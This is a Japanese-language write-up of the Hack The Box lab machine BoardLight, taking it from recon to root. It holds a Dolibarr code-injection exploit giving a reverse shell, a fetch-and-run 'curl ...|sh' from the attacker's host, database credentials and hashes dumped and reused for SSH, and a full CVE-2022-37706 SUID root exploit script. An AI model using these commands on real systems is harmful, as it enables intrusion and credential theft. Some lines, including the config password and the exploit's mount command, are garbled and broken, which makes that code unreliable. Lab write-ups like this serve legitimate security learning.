Writeup | Hack the Box: BoardLight (original) (raw)
Season 5終わったので公開。 初参戦シーズンということもあってEASYしか解けなかったけど、今までの知識でなんとか出来た。
echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
nmap
nmap -sC -A board.htb
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
- 22: SSH
- 80: HTTP
標準構成
Web
- http://boardlight.htb
- Burp ONで見てみる
- フォームが1つ contact.php
action=""
=> 実装されていない?- name属性もないので実装されてなさそう
なんかコメントアウトされてるページがある
- http://board.htb/portfolio.php
File not found.
なさそうか- http://board.htb/404 => これはApacheの404
- http://board.htb/test.php => File not found.
- http://board.htb/_portfolio.php => 404
ffuf
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ.php
about [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 172ms] contact [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 164ms] do [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 291ms] index [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 160ms]
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ
.htaccess [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms] .hta [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms] [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 309ms] .htpasswd [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 157ms] css [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 157ms] images [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 156ms] index.php [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 2280ms] js [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 156ms] server-status [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 165ms]
- 特に怪しいのはなし
- Webの問題ではないかも
CVE-2021-40438 => SSRF?
whatweb -a 3 http://board.htb
http://board.htb [200 OK] Apache[2.4.41], Bootstrap[4.3.1], Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]
CVE-2021-40438
=> SSRF脆弱性あり
中身はこれ
GET http://board.htb/?unix:AA...AAAA|http://127.0.0.1:3000/
pythonで実行している
python3 CVE-2021-40438.py -t http://board.htb -ssrf http://10.10.16.22:8000 | head
- 成功しない 違うかも...
サブドメイン探索
board.htb
とwebに書いてあるからサブドメインもあるか?
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
-H "Host: FUZZ.board.htb" -u http://board.htb/
-fs 15949
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6241ms]
あったわ。
echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
Dolibarr => CVE-2023-30253
- http://crm.board.htb/
- Dolibarr 17.0.0
- Login/Password
- CVE-2023-30253
- PHP Code Injection
- https://github.com/Dolibarr/dolibarr/issues/6568#issuecomment-1912088743
- admin/admin がデフォルト
- 入れた
Current login: admin
nc -lnvp 4444
python3 exploit.py http://crm.board.htb admin admin 10.10.16.22 4444
yessss!
www-data@boardlight:/html/crm.board.htb/htdocs/public/website$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/public/website
www-data@boardlight:/html/crm.board.htb/htdocs/public/website$ whoami
whoami
www-data
www-data@boardlight:~$ ls -la /home ls -la /home total 12 drwxr-xr-x 3 root root 4096 May 17 01:04 . drwxr-xr-x 19 root root 4096 May 17 01:04 .. drwxr-x--- 16 larissa larissa 4096 Jun 25 03:33 larissa
larissa というのがユーザーっぽいけど、 www-data
ではアクセスできない
linpears
www-data
でアクセス出来そうなファイルを探す
localでhostさせておく
python3 -m http.server 8000
curl http://10.10.16.22:8000/linpeas.sh|sh
larissaのファイルがたくさん
www-data@boardlight:~/html/board.htb$ -la ls -la total 72 drwxr-xr-x 5 www-data www-data 4096 May 17 01:04 . drwxr-xr-x 4 www-data www-data 4096 May 17 01:04 .. -rw-rw-r-- 1 larissa larissa 9100 May 15 11:01 about.php -rw-rw-r-- 1 larissa larissa 9426 May 15 11:02 contact.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 css -rw-rw-r-- 1 larissa larissa 9209 May 15 11:02 do.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 images -rw-rw-r-- 1 larissa larissa 15949 May 15 11:02 index.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 js
MySQL生きてそう
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
バックアップファイル => 収穫無し
-r-------- 1 www-data www-data 16394 May 13 13:20 /var/www/html/crm.board.htb/htdocs/conf/conf.php.old
www-data@boardlight:/html/crm.board.htb/htdocs/conf$ ls -la
ls -la
total 56
drwxr-xr-x 2 www-data www-data 4096 May 17 00:18 .
drwxr-xr-x 79 www-data www-data 4096 Mar 4 2023 ..
-rw-r--r-- 1 www-data www-data 31 Mar 4 2023 .htaccess
-rw-r--r-- 1 www-data www-data 1736 May 17 00:18 conf.php
-rw-r--r-- 1 www-data www-data 16394 Mar 4 2023 conf.php.example
-r-------- 1 www-data www-data 16394 May 13 13:20 conf.php.old
www-data@boardlight:/html/crm.board.htb/htdocs/conf$ pwd
pwd
/var/www/html/crm.board.htb/htdocs/conf
conf.php
$dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_user='dolibarrowner'; dolibarrmaindbpass=′serverfun2dolibarr_main_db_pass='serverfun2dolibarrmaindbpass=′serverfun22023!!';
MySQL
serverfun2$2023!!
mysql -u dolibarrowner -p dolibarr
アカウントテーブル
SHOW TABLES; => llx_user
\g SELECT * FROM llx_user\G;
*************************** 1. row *************************** rowid: 1 ... login: dolibarr pass_crypted: 2y2y2y10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm pass_temp: NULL api_key: NULL lastname: SuperAdmin *************************** 2. row *************************** rowid: 2 ... login: admin pass_crypted: 2y2y2y10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 pass_temp: NULL api_key: yr6V3pXd9QEI lastname: admin
$2y$10$
=> bcrypt
=> failed
hashcat -m 3200 2y2y2y10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
user
- serverfun2$2023!! というパスワードはきっとヒント
- larissaでログインしてみたら入れた
ssh larissa@board.htb
The authenticity of host 'board.htb (10.10.11.11)' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts.
larissa@board.htb's password:
Last login: Tue Jun 25 03:12:56 2024 from 10.10.14.116
larissa@boardlight:~$
larissa@boardlight:~$ cat user.txt XXXX
再び linpeas
- sudoers ではない
larissa@boardlight:$ id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
larissa@boardlight:$ sudo -l
[sudo] password for larissa:
Sorry, user larissa may not run sudo on localhost.
さきほどのlinpeasの結果をもう一度見る
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!)
-rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
enlightenment_sys
とかいうの怪しい
Enlightenment => マシン名BoardLightだしたぶんこれっぽい
この通り実行していく
check
larissa@boardlight:~/tmp$ file /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c32a8a1b279ba209d1029c51435d64b86ca09b8b, for GNU/Linux 3.2.0, stripped
実行しても出力なし => OK
larissa@boardlight:/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
larissa@boardlight:/tmp$
help => OK
larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys --help This is an internal tool for Enlightenment. do not use it.
strace
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep open openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeina.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libecore.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbluetooth.so.3", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/librt.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libsystemd.so.0", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind-x86_64.so.8", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind.so.8", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeo.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libefl.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libglib-2.0.so.0", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblz4.so.1", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgcrypt.so.20", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre.so.3", O_RDONLY|O_CLOEXEC) = 3 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgpg-error.so.0", O_RDONLY|O_CLOEXEC) = 3
strace exec
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep exec execve("/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys", ["/usr/lib/x86_64-linux-gnu/enligh"...], 0x7ffc29275890 /* 18 vars */) = 0
syscallが成功している
larissa@boardlight:~/tmp$ cat ex.sh #!/bin/bash
echo "CVE-2022-37706" echo "[] Trying to find the vulnerable SUID file..." echo "[] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1) if [[ -z ${file} ]] then echo "[-] Couldn't find the vulnerable SUID file..." echo "[*] Enlightenment should be installed on your system." exit 1 fi
echo "[+] Vulnerable SUID binary found!" echo "[+] Trying to pop a root shell!" mkdir -p /tmp/net mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit echo "[+] Enjoy the root shell :)" file/bin/mount−onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid={file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=file/bin/mount−onoexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net larissa@boardlight:~/tmp$ sh ex.sh CVE-2022-37706 [] Trying to find the vulnerable SUID file... [] This may take few seconds... ex.sh: 8: [[: not found [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can't find in /etc/fstab.
whoami
root
cd /root/
ls
root.txt snap
cat root.txt
XXXX
got it!